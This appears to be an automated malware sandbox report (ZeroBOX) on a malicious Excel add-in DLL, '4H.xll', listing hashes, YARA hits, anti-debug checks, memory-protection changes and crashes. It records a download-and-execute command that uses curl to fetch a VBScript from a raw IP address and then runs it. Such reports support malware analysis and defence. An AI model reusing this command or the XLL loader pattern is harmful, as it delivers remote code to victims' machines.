Summary | ZeroBOX

4H.xll

PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 4, 2023, 2:16 p.m. Oct. 4, 2023, 2:18 p.m.
Size 50.0KB
Type PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 31a57c5f8a6b8bd49f1ec6583c9ade36
SHA256 0b479e2c669f50aa7f3c93f8e32512696012f46d2c03c48627da9ad0016cdfd1
CRC32 71F3753E
ssdeep 1536:f7pxSJsy6Nh5wFHssKjrtN/5jqzyCNwGXGhriUc45cmN:lYwNh5wFHssKXnxjNCNHGirmN
Yara
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)
  • IsPE64 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'C:\Windows\system32\curl.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
xlAutoOpen+0x9b90 4h+0xb000 @ 0x7fef9adb000
rundll32+0x2f42 @ 0xff072f42
rundll32+0x3b7a @ 0xff073b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 70 c2 ad f9 fe 07 00 00 00 00 00 00 00 00 00 00
exception.instruction: jo 0x7fef9adafc4
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x9b90 4h+0xb000
exception.address: 0x7fef9adb000
registers.r14: 0
registers.r15: 0
registers.rcx: 327962
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1047296
registers.r11: 1046384
registers.r8: 1360004
registers.r9: 10
registers.rdx: 4278648832
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 327962
registers.r13: 0
1 0 0

__exception__

stacktrace:
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972
0x223e74706972

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x223e74706972
registers.r14: 0
registers.r15: 0
registers.rcx: 48
registers.rsi: 0
registers.r10: 0
registers.rbx: 524664
registers.rsp: 2029360
registers.r11: 514
registers.r8: 2027528
registers.r9: 2027584
registers.rdx: 8796092879440
registers.r12: 7166123367813687397
registers.rbp: 2474048
registers.rdi: -1
registers.rax: 0
registers.r13: 0
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2880
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2916
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2964
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://149.28.114.69/lML/Lvqo&&timeout 10&&c:\users\public\123321.vbs
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://149.28.114.69/lML/Lvqo&&timeout 10&&c:\users\public\123321.vbs
filepath: cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff90000
process_handle: 0xffffffffffffffff
1 0 0